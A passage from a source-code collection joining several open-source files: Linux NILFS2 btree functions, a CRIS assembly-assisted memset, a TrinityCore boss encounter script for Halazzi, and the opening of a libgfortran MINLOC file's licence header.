set_buffer_nilfs_volatile(path[level].bp_bh);
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
nilfs_btree_node_set_ptr(parent, path[level + 1].bp_index,
path[level].bp_newreq.bpr_ptr, ncmax);
}
static void nilfs_btree_abort_update_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, struct inode *dat)
{
nilfs_dat_abort_update(dat, &path[level].bp_oldreq.bpr_req,
&path[level].bp_newreq.bpr_req);
if (buffer_nilfs_node(path[level].bp_bh))
nilfs_btnode_abort_change_key(
&NILFS_BMAP_I(btree)->i_btnode_cache,
&path[level].bp_ctxt);
}
static int nilfs_btree_prepare_propagate_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int minlevel, int *maxlevelp,
struct inode *dat)
{
int level, ret;
level = minlevel;
if (!buffer_nilfs_volatile(path[level].bp_bh)) {
ret = nilfs_btree_prepare_update_v(btree, path, level, dat);
if (ret < 0)
return ret;
}
while ((++level < nilfs_btree_height(btree) - 1) &&
!buffer_dirty(path[level].bp_bh)) {
WARN_ON(buffer_nilfs_volatile(path[level].bp_bh));
ret = nilfs_btree_prepare_update_v(btree, path, level, dat);
if (ret < 0)
goto out;
}
/* success */
*maxlevelp = level - 1;
return 0;
/* error */
out:
while (--level > minlevel)
nilfs_btree_abort_update_v(btree, path, level, dat);
if (!buffer_nilfs_volatile(path[level].bp_bh))
nilfs_btree_abort_update_v(btree, path, level, dat);
return ret;
}
static void nilfs_btree_commit_propagate_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int minlevel, int maxlevel,
struct buffer_head *bh,
struct inode *dat)
{
int level;
if (!buffer_nilfs_volatile(path[minlevel].bp_bh))
nilfs_btree_commit_update_v(btree, path, minlevel, dat);
for (level = minlevel + 1; level <= maxlevel; level++)
nilfs_btree_commit_update_v(btree, path, level, dat);
}
static int nilfs_btree_propagate_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level, struct buffer_head *bh)
{
int maxlevel = 0, ret;
struct nilfs_btree_node *parent;
struct inode *dat = nilfs_bmap_get_dat(btree);
__u64 ptr;
int ncmax;
get_bh(bh);
path[level].bp_bh = bh;
ret = nilfs_btree_prepare_propagate_v(btree, path, level, &maxlevel,
dat);
if (ret < 0)
goto out;
if (buffer_nilfs_volatile(path[level].bp_bh)) {
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
ptr = nilfs_btree_node_get_ptr(parent,
path[level + 1].bp_index,
ncmax);
ret = nilfs_dat_mark_dirty(dat, ptr);
if (ret < 0)
goto out;
}
nilfs_btree_commit_propagate_v(btree, path, level, maxlevel, bh, dat);
out:
brelse(path[level].bp_bh);
path[level].bp_bh = NULL;
return ret;
}
static int nilfs_btree_propagate(struct nilfs_bmap *btree,
struct buffer_head *bh)
{
struct nilfs_btree_path *path;
struct nilfs_btree_node *node;
__u64 key;
int level, ret;
WARN_ON(!buffer_dirty(bh));
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
if (buffer_nilfs_node(bh)) {
node = (struct nilfs_btree_node *)bh->b_data;
key = nilfs_btree_node_get_key(node, 0);
level = nilfs_btree_node_get_level(node);
} else {
key = nilfs_bmap_data_get_key(btree, bh);
level = NILFS_BTREE_LEVEL_DATA;
}
ret = nilfs_btree_do_lookup(btree, path, key, NULL, level + 1, 0);
if (ret < 0) {
if (unlikely(ret == -ENOENT))
printk(KERN_CRIT "%s: key = %llu, level == %d\n",
__func__, (unsigned long long)key, level);
goto out;
}
ret = NILFS_BMAP_USE_VBN(btree) ?
nilfs_btree_propagate_v(btree, path, level, bh) :
nilfs_btree_propagate_p(btree, path, level, bh);
out:
nilfs_btree_free_path(path);
return ret;
}
static int nilfs_btree_propagate_gc(struct nilfs_bmap *btree,
struct buffer_head *bh)
{
return nilfs_dat_mark_dirty(nilfs_bmap_get_dat(btree), bh->b_blocknr);
}
static void nilfs_btree_add_dirty_buffer(struct nilfs_bmap *btree,
struct list_head *lists,
struct buffer_head *bh)
{
struct list_head *head;
struct buffer_head *cbh;
struct nilfs_btree_node *node, *cnode;
__u64 key, ckey;
int level;
get_bh(bh);
node = (struct nilfs_btree_node *)bh->b_data;
key = nilfs_btree_node_get_key(node, 0);
level = nilfs_btree_node_get_level(node);
if (level < NILFS_BTREE_LEVEL_NODE_MIN ||
level >= NILFS_BTREE_LEVEL_MAX) {
dump_stack();
printk(KERN_WARNING
"%s: invalid btree level: %d (key=%llu, ino=%lu, "
"blocknr=%llu)\n",
__func__, level, (unsigned long long)key,
NILFS_BMAP_I(btree)->vfs_inode.i_ino,
(unsigned long long)bh->b_blocknr);
return;
}
list_for_each(head, &lists[level]) {
cbh = list_entry(head, struct buffer_head, b_assoc_buffers);
cnode = (struct nilfs_btree_node *)cbh->b_data;
ckey = nilfs_btree_node_get_key(cnode, 0);
if (key < ckey)
break;
}
list_add_tail(&bh->b_assoc_buffers, head);
}
static void nilfs_btree_lookup_dirty_buffers(struct nilfs_bmap *btree,
struct list_head *listp)
{
struct address_space *btcache = &NILFS_BMAP_I(btree)->i_btnode_cache;
struct list_head lists[NILFS_BTREE_LEVEL_MAX];
struct pagevec pvec;
struct buffer_head *bh, *head;
pgoff_t index = 0;
int level, i;
for (level = NILFS_BTREE_LEVEL_NODE_MIN;
level < NILFS_BTREE_LEVEL_MAX;
level++)
INIT_LIST_HEAD(&lists[level]);
pagevec_init(&pvec, 0);
while (pagevec_lookup_tag(&pvec, btcache, &index, PAGECACHE_TAG_DIRTY,
PAGEVEC_SIZE)) {
for (i = 0; i < pagevec_count(&pvec); i++) {
bh = head = page_buffers(pvec.pages[i]);
do {
if (buffer_dirty(bh))
nilfs_btree_add_dirty_buffer(btree,
lists, bh);
} while ((bh = bh->b_this_page) != head);
}
pagevec_release(&pvec);
cond_resched();
}
for (level = NILFS_BTREE_LEVEL_NODE_MIN;
level < NILFS_BTREE_LEVEL_MAX;
level++)
list_splice_tail(&lists[level], listp);
}
static int nilfs_btree_assign_p(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_node *parent;
__u64 key;
__u64 ptr;
int ncmax, ret;
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
ptr = nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
ncmax);
if (buffer_nilfs_node(*bh)) {
path[level].bp_ctxt.oldkey = ptr;
path[level].bp_ctxt.newkey = blocknr;
path[level].bp_ctxt.bh = *bh;
ret = nilfs_btnode_prepare_change_key(
&NILFS_BMAP_I(btree)->i_btnode_cache,
&path[level].bp_ctxt);
if (ret < 0)
return ret;
nilfs_btnode_commit_change_key(
&NILFS_BMAP_I(btree)->i_btnode_cache,
&path[level].bp_ctxt);
*bh = path[level].bp_ctxt.bh;
}
nilfs_btree_node_set_ptr(parent, path[level + 1].bp_index, blocknr,
ncmax);
key = nilfs_btree_node_get_key(parent, path[level + 1].bp_index);
/* on-disk format */
binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
binfo->bi_dat.bi_level = level;
return 0;
}
static int nilfs_btree_assign_v(struct nilfs_bmap *btree,
struct nilfs_btree_path *path,
int level,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_node *parent;
struct inode *dat = nilfs_bmap_get_dat(btree);
__u64 key;
__u64 ptr;
union nilfs_bmap_ptr_req req;
int ncmax, ret;
parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
ptr = nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
ncmax);
req.bpr_ptr = ptr;
ret = nilfs_dat_prepare_start(dat, &req.bpr_req);
if (ret < 0)
return ret;
nilfs_dat_commit_start(dat, &req.bpr_req, blocknr);
key = nilfs_btree_node_get_key(parent, path[level + 1].bp_index);
/* on-disk format */
binfo->bi_v.bi_vblocknr = cpu_to_le64(ptr);
binfo->bi_v.bi_blkoff = cpu_to_le64(key);
return 0;
}
static int nilfs_btree_assign(struct nilfs_bmap *btree,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_path *path;
struct nilfs_btree_node *node;
__u64 key;
int level, ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
if (buffer_nilfs_node(*bh)) {
node = (struct nilfs_btree_node *)(*bh)->b_data;
key = nilfs_btree_node_get_key(node, 0);
level = nilfs_btree_node_get_level(node);
} else {
key = nilfs_bmap_data_get_key(btree, *bh);
level = NILFS_BTREE_LEVEL_DATA;
}
ret = nilfs_btree_do_lookup(btree, path, key, NULL, level + 1, 0);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
goto out;
}
ret = NILFS_BMAP_USE_VBN(btree) ?
nilfs_btree_assign_v(btree, path, level, bh, blocknr, binfo) :
nilfs_btree_assign_p(btree, path, level, bh, blocknr, binfo);
out:
nilfs_btree_free_path(path);
return ret;
}
static int nilfs_btree_assign_gc(struct nilfs_bmap *btree,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_node *node;
__u64 key;
int ret;
ret = nilfs_dat_move(nilfs_bmap_get_dat(btree), (*bh)->b_blocknr,
blocknr);
if (ret < 0)
return ret;
if (buffer_nilfs_node(*bh)) {
node = (struct nilfs_btree_node *)(*bh)->b_data;
key = nilfs_btree_node_get_key(node, 0);
} else
key = nilfs_bmap_data_get_key(btree, *bh);
/* on-disk format */
binfo->bi_v.bi_vblocknr = cpu_to_le64((*bh)->b_blocknr);
binfo->bi_v.bi_blkoff = cpu_to_le64(key);
return 0;
}
static int nilfs_btree_mark(struct nilfs_bmap *btree, __u64 key, int level)
{
struct buffer_head *bh;
struct nilfs_btree_path *path;
__u64 ptr;
int ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, &ptr, level + 1, 0);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
goto out;
}
ret = nilfs_btree_get_block(btree, ptr, &bh);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
goto out;
}
if (!buffer_dirty(bh))
mark_buffer_dirty(bh);
brelse(bh);
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
out:
nilfs_btree_free_path(path);
return ret;
}
static const struct nilfs_bmap_operations nilfs_btree_ops = {
.bop_lookup = nilfs_btree_lookup,
.bop_lookup_contig = nilfs_btree_lookup_contig,
.bop_insert = nilfs_btree_insert,
.bop_delete = nilfs_btree_delete,
.bop_clear = NULL,
.bop_propagate = nilfs_btree_propagate,
.bop_lookup_dirty_buffers = nilfs_btree_lookup_dirty_buffers,
.bop_assign = nilfs_btree_assign,
.bop_mark = nilfs_btree_mark,
.bop_last_key = nilfs_btree_last_key,
.bop_check_insert = NULL,
.bop_check_delete = nilfs_btree_check_delete,
.bop_gather_data = nilfs_btree_gather_data,
};
static const struct nilfs_bmap_operations nilfs_btree_ops_gc = {
.bop_lookup = NULL,
.bop_lookup_contig = NULL,
.bop_insert = NULL,
.bop_delete = NULL,
.bop_clear = NULL,
.bop_propagate = nilfs_btree_propagate_gc,
.bop_lookup_dirty_buffers = nilfs_btree_lookup_dirty_buffers,
.bop_assign = nilfs_btree_assign_gc,
.bop_mark = NULL,
.bop_last_key = NULL,
.bop_check_insert = NULL,
.bop_check_delete = NULL,
.bop_gather_data = NULL,
};
int nilfs_btree_init(struct nilfs_bmap *bmap)
{
bmap->b_ops = &nilfs_btree_ops;
bmap->b_nchildren_per_block =
NILFS_BTREE_NODE_NCHILDREN_MAX(nilfs_btree_node_size(bmap));
return 0;
}
void nilfs_btree_init_gc(struct nilfs_bmap *bmap)
{
bmap->b_ops = &nilfs_btree_ops_gc;
bmap->b_nchildren_per_block =
NILFS_BTREE_NODE_NCHILDREN_MAX(nilfs_btree_node_size(bmap));
}
| gpl-2.0 |
estiko/kernel_smartfren_d5c | arch/cris/arch-v32/lib/memset.c | 27906 | 7459 | /* A memset for CRIS.
Copyright (C) 1999-2005 Axis Communications.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Neither the name of Axis Communications nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AXIS COMMUNICATIONS AND ITS CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL AXIS
COMMUNICATIONS OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
/* FIXME: This file should really only be used for reference, as the
result is somewhat depending on gcc generating what we expect rather
than what we describe. An assembly file should be used instead. */
/* Note the multiple occurrence of the expression "12*4", including the
asm. It is hard to get it into the asm in a good way. Thus better to
expose the problem everywhere: no macro. */
/* Assuming one cycle per dword written or read (ok, not really true; the
world is not ideal), and one cycle per instruction, then 43+3*(n/48-1)
<= 24+24*(n/48-1) so n >= 45.7; n >= 0.9; we win on the first full
48-byte block to set. */
#define MEMSET_BY_BLOCK_THRESHOLD (1 * 48)
/* No name ambiguities in this file. */
__asm__ (".syntax no_register_prefix");
void *memset(void *pdst, int c, unsigned int plen)
{
/* Now we want the parameters in special registers. Make sure the
compiler does something usable with this. */
register char *return_dst __asm__ ("r10") = pdst;
register int n __asm__ ("r12") = plen;
register int lc __asm__ ("r11") = c;
/* Most apps use memset sanely. Memsetting about 3..4 bytes or less get
penalized here compared to the generic implementation. */
/* This is fragile performancewise at best. Check with newer GCC
releases, if they compile cascaded "x |= x << 8" to sane code. */
__asm__("movu.b %0,r13 \n\
lslq 8,r13 \n\
move.b %0,r13 \n\
move.d r13,%0 \n\
lslq 16,r13 \n\
or.d r13,%0"
: "=r" (lc) /* Inputs. */
: "0" (lc) /* Outputs. */
: "r13"); /* Trash. */
{
register char *dst __asm__ ("r13") = pdst;
if (((unsigned long) pdst & 3) != 0
/* Oops! n = 0 must be a valid call, regardless of alignment. */
&& n >= 3)
{
if ((unsigned long) dst & 1)
{
*dst = (char) lc;
n--;
dst++;
}
if ((unsigned long) dst & 2)
{
*(short *) dst = lc;
n -= 2;
dst += 2;
}
}
/* Decide which setting method to use. */
if (n >= MEMSET_BY_BLOCK_THRESHOLD)
{
/* It is not optimal to tell the compiler about clobbering any
registers; that will move the saving/restoring of those registers
to the function prologue/epilogue, and make non-block sizes
suboptimal. */
__asm__ volatile
("\
;; GCC does promise correct register allocations, but let's \n\
;; make sure it keeps its promises. \n\
.ifnc %0-%1-%4,$r13-$r12-$r11 \n\
.error \"GCC reg alloc bug: %0-%1-%4 != $r13-$r12-$r11\" \n\
.endif \n\
\n\
;; Save the registers we'll clobber in the movem process \n\
;; on the stack. Don't mention them to gcc, it will only be \n\
;; upset. \n\
subq 11*4,sp \n\
movem r10,[sp] \n\
\n\
move.d r11,r0 \n\
move.d r11,r1 \n\
move.d r11,r2 \n\
move.d r11,r3 \n\
move.d r11,r4 \n\
move.d r11,r5 \n\
move.d r11,r6 \n\
move.d r11,r7 \n\
move.d r11,r8 \n\
move.d r11,r9 \n\
move.d r11,r10 \n\
\n\
;; Now we've got this: \n\
;; r13 - dst \n\
;; r12 - n \n\
\n\
;; Update n for the first loop \n\
subq 12*4,r12 \n\
0: \n\
"
#ifdef __arch_common_v10_v32
/* Cater to branch offset difference between v32 and v10. We
assume the branch below has an 8-bit offset. */
" setf\n"
#endif
" subq 12*4,r12 \n\
bge 0b \n\
movem r11,[r13+] \n\
\n\
;; Compensate for last loop underflowing n. \n\
addq 12*4,r12 \n\
\n\
;; Restore registers from stack. \n\
movem [sp+],r10"
/* Outputs. */
: "=r" (dst), "=r" (n)
/* Inputs. */
: "0" (dst), "1" (n), "r" (lc));
}
/* An ad-hoc unroll, used for 4*12-1..16 bytes. */
while (n >= 16)
{
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
n -= 16;
}
switch (n)
{
case 0:
break;
case 1:
*dst = (char) lc;
break;
case 2:
*(short *) dst = (short) lc;
break;
case 3:
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 4:
*(long *) dst = lc;
break;
case 5:
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 6:
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 7:
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 8:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc;
break;
case 9:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 10:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 11:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 12:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc;
break;
case 13:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 14:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 15:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
}
}
return return_dst;
}
| gpl-2.0 |
EndScene/Catherine_3.3.5a | src/server/scripts/EasternKingdoms/ZulAman/boss_halazzi.cpp | 3 | 14230 | /*
* Copyright (C) 2008-2013 TrinityCore <http://www.trinitycore.org/>
* Copyright (C) 2006-2009 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/* ScriptData
SDName: boss_Halazzi
SD%Complete: 80
SDComment:
SDCategory: Zul'Aman
EndScriptData */
#include "ScriptMgr.h"
#include "ScriptedCreature.h"
#include "zulaman.h"
#include "SpellInfo.h"
#define YELL_AGGRO "Get on your knees and bow to da fang and claw!"
#define SOUND_AGGRO 12020
#define YELL_SABER_ONE "You gonna leave in pieces!"
#define YELL_SABER_TWO "Me gonna carve ya now!"
#define YELL_SPLIT "Me gonna carve ya now!"
#define SOUND_SPLIT 12021
#define YELL_MERGE "Spirit, come back to me!"
#define SOUND_MERGE 12022
#define YELL_KILL_ONE "You cant fight the power!"
#define SOUND_KILL_ONE 12026
#define YELL_KILL_TWO "You gonna fail!"
#define SOUND_KILL_TWO 12027
#define YELL_DEATH "Chaga... choka'jinn."
#define SOUND_DEATH 12028
#define YELL_BERSERK "Whatch you be doing? Pissin' yourselves..."
#define SOUND_BERSERK 12025
enum Spells
{
SPELL_DUAL_WIELD = 29651,
SPELL_SABER_LASH = 43267,
SPELL_FRENZY = 43139,
SPELL_FLAMESHOCK = 43303,
SPELL_EARTHSHOCK = 43305,
SPELL_TRANSFORM_SPLIT = 43142,
SPELL_TRANSFORM_SPLIT2 = 43573,
SPELL_TRANSFORM_MERGE = 43271,
SPELL_SUMMON_LYNX = 43143,
SPELL_SUMMON_TOTEM = 43302,
SPELL_BERSERK = 45078,
SPELL_LYNX_FRENZY = 43290, // Used by Spirit Lynx
SPELL_SHRED_ARMOR = 43243 // Used by Spirit Lynx
};
enum Hal_CreatureIds
{
NPC_SPIRIT_LYNX = 24143,
NPC_TOTEM = 24224
};
enum PhaseHalazzi
{
PHASE_NONE = 0,
PHASE_LYNX = 1,
PHASE_SPLIT = 2,
PHASE_HUMAN = 3,
PHASE_MERGE = 4,
PHASE_ENRAGE = 5
};
class boss_halazzi : public CreatureScript
{
public:
boss_halazzi()
: CreatureScript("boss_halazzi")
{
}
struct boss_halazziAI : public ScriptedAI
{
boss_halazziAI(Creature* creature) : ScriptedAI(creature)
{
instance = creature->GetInstanceScript();
}
InstanceScript* instance;
uint32 FrenzyTimer;
uint32 SaberlashTimer;
uint32 ShockTimer;
uint32 TotemTimer;
uint32 CheckTimer;
uint32 BerserkTimer;
uint32 TransformCount;
PhaseHalazzi Phase;
uint64 LynxGUID;
void Reset()
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, NOT_STARTED);
LynxGUID = 0;
TransformCount = 0;
BerserkTimer = 600000;
CheckTimer = 1000;
DoCast(me, SPELL_DUAL_WIELD, true);
Phase = PHASE_NONE;
EnterPhase(PHASE_LYNX);
}
void EnterCombat(Unit* /*who*/)
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, IN_PROGRESS);
me->MonsterYell(YELL_AGGRO, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_AGGRO);
EnterPhase(PHASE_LYNX);
}
void JustSummoned(Creature* summon)
{
summon->AI()->AttackStart(me->GetVictim());
if (summon->GetEntry() == NPC_SPIRIT_LYNX)
LynxGUID = summon->GetGUID();
}
void DamageTaken(Unit* /*done_by*/, uint32 &damage)
{
if (damage >= me->GetHealth() && Phase != PHASE_ENRAGE)
damage = 0;
}
void SpellHit(Unit*, const SpellInfo* spell)
{
if (spell->Id == SPELL_TRANSFORM_SPLIT2)
EnterPhase(PHASE_HUMAN);
}
void AttackStart(Unit* who)
{
if (Phase != PHASE_MERGE) ScriptedAI::AttackStart(who);
}
void EnterPhase(PhaseHalazzi NextPhase)
{
switch (NextPhase)
{
case PHASE_LYNX:
case PHASE_ENRAGE:
if (Phase == PHASE_MERGE)
{
DoCast(me, SPELL_TRANSFORM_MERGE, true);
me->Attack(me->GetVictim(), true);
me->GetMotionMaster()->MoveChase(me->GetVictim());
}
if (Creature* Lynx = Unit::GetCreature(*me, LynxGUID))
Lynx->DisappearAndDie();
me->SetMaxHealth(600000);
me->SetHealth(600000 - 150000 * TransformCount);
FrenzyTimer = 16000;
SaberlashTimer = 20000;
ShockTimer = 10000;
TotemTimer = 12000;
break;
case PHASE_SPLIT:
me->MonsterYell(YELL_SPLIT, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_SPLIT);
DoCast(me, SPELL_TRANSFORM_SPLIT, true);
break;
case PHASE_HUMAN:
//DoCast(me, SPELL_SUMMON_LYNX, true);
DoSpawnCreature(NPC_SPIRIT_LYNX, 5, 5, 0, 0, TEMPSUMMON_CORPSE_DESPAWN, 0);
me->SetMaxHealth(400000);
me->SetHealth(400000);
ShockTimer = 10000;
TotemTimer = 12000;
break;
case PHASE_MERGE:
if (Unit* pLynx = Unit::GetUnit(*me, LynxGUID))
{
me->MonsterYell(YELL_MERGE, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_MERGE);
pLynx->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NON_ATTACKABLE);
pLynx->GetMotionMaster()->Clear();
pLynx->GetMotionMaster()->MoveFollow(me, 0, 0);
me->GetMotionMaster()->Clear();
me->GetMotionMaster()->MoveFollow(pLynx, 0, 0);
++TransformCount;
}
break;
default:
break;
}
Phase = NextPhase;
}
void UpdateAI(uint32 diff)
{
if (!UpdateVictim())
return;
if (BerserkTimer <= diff)
{
me->MonsterYell(YELL_BERSERK, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_BERSERK);
DoCast(me, SPELL_BERSERK, true);
BerserkTimer = 60000;
} else BerserkTimer -= diff;
if (Phase == PHASE_LYNX || Phase == PHASE_ENRAGE)
{
if (SaberlashTimer <= diff)
{
// A tank with more than 490 defense skills should receive no critical hit
//DoCast(me, 41296, true);
DoCastVictim(SPELL_SABER_LASH, true);
//me->RemoveAurasDueToSpell(41296);
SaberlashTimer = 30000;
} else SaberlashTimer -= diff;
if (FrenzyTimer <= diff)
{
DoCast(me, SPELL_FRENZY);
FrenzyTimer = urand(10000, 15000);
} else FrenzyTimer -= diff;
if (Phase == PHASE_LYNX)
{
if (CheckTimer <= diff)
{
if (HealthBelowPct(25 * (3 - TransformCount)))
EnterPhase(PHASE_SPLIT);
CheckTimer = 1000;
} else CheckTimer -= diff;
}
}
if (Phase == PHASE_HUMAN || Phase == PHASE_ENRAGE)
{
if (TotemTimer <= diff)
{
DoCast(me, SPELL_SUMMON_TOTEM);
TotemTimer = 20000;
} else TotemTimer -= diff;
if (ShockTimer <= diff)
{
if (Unit* target = SelectTarget(SELECT_TARGET_RANDOM, 0))
{
if (target->IsNonMeleeSpellCasted(false))
DoCast(target, SPELL_EARTHSHOCK);
else
DoCast(target, SPELL_FLAMESHOCK);
ShockTimer = urand(10000, 15000);
}
} else ShockTimer -= diff;
if (Phase == PHASE_HUMAN)
{
if (CheckTimer <= diff)
{
if (!HealthAbovePct(20) /*HealthBelowPct(10)*/)
EnterPhase(PHASE_MERGE);
else
{
Unit* Lynx = Unit::GetUnit(*me, LynxGUID);
if (Lynx && !Lynx->HealthAbovePct(20) /*Lynx->HealthBelowPct(10)*/)
EnterPhase(PHASE_MERGE);
}
CheckTimer = 1000;
} else CheckTimer -= diff;
}
}
if (Phase == PHASE_MERGE)
{
if (CheckTimer <= diff)
{
Unit* Lynx = Unit::GetUnit(*me, LynxGUID);
if (Lynx)
{
Lynx->GetMotionMaster()->MoveFollow(me, 0, 0);
me->GetMotionMaster()->MoveFollow(Lynx, 0, 0);
if (me->IsWithinDistInMap(Lynx, 6.0f))
{
if (TransformCount < 3)
EnterPhase(PHASE_LYNX);
else
EnterPhase(PHASE_ENRAGE);
}
}
CheckTimer = 1000;
} else CheckTimer -= diff;
}
DoMeleeAttackIfReady();
}
void KilledUnit(Unit* /*victim*/)
{
switch (urand(0, 1))
{
case 0:
me->MonsterYell(YELL_KILL_ONE, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_KILL_ONE);
break;
case 1:
me->MonsterYell(YELL_KILL_TWO, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_KILL_TWO);
break;
}
}
void JustDied(Unit* /*killer*/)
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, DONE);
me->MonsterYell(YELL_DEATH, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_DEATH);
}
};
CreatureAI* GetAI(Creature* creature) const
{
return new boss_halazziAI(creature);
}
};
// Spirits Lynx AI
class mob_halazzi_lynx : public CreatureScript
{
public:
mob_halazzi_lynx()
: CreatureScript("mob_halazzi_lynx")
{
}
struct mob_halazzi_lynxAI : public ScriptedAI
{
mob_halazzi_lynxAI(Creature* creature) : ScriptedAI(creature) {}
uint32 FrenzyTimer;
uint32 shredder_timer;
void Reset()
{
FrenzyTimer = urand(30000, 50000); //frenzy every 30-50 seconds
shredder_timer = 4000;
}
void DamageTaken(Unit* /*done_by*/, uint32 &damage)
{
if (damage >= me->GetHealth())
damage = 0;
}
void AttackStart(Unit* who)
{
if (!me->HasFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NON_ATTACKABLE))
ScriptedAI::AttackStart(who);
}
void EnterCombat(Unit* /*who*/) {/*DoZoneInCombat();*/}
void UpdateAI(uint32 diff)
{
if (!UpdateVictim())
return;
if (FrenzyTimer <= diff)
{
DoCast(me, SPELL_LYNX_FRENZY);
FrenzyTimer = urand(30000, 50000); //frenzy every 30-50 seconds
} else FrenzyTimer -= diff;
if (shredder_timer <= diff)
{
DoCastVictim(SPELL_SHRED_ARMOR);
shredder_timer = 4000;
} else shredder_timer -= diff;
DoMeleeAttackIfReady();
}
};
CreatureAI* GetAI(Creature* creature) const
{
return new mob_halazzi_lynxAI(creature);
}
};
void AddSC_boss_halazzi()
{
new boss_halazzi();
new mob_halazzi_lynx();
}
| gpl-2.0 |
mickael-guene/gcc | libgfortran/generated/minloc1_4_r10.c | 3 | 13179 | /* Implementation of the MINLOC intrinsic
Copyright (C) 2002-2017 Free Software Foundation, Inc.
Contributed by Paul Brook <paul@nowt.org>
This file is part of the GNU Fortran runtime library (libgfortran).
Libgfortran is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3 of the License, or (at your option) any later version.
Libgfortran is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
Under Section 7 of GPL version 3, you are granted additional
permissions described in the GCC Runtime Library Exception, version
3.1, as published by the Free Software Foundation.
You should have received a copy of the GNU General Public License and
a copy of the GCC Runtime Library Exception along with this program;
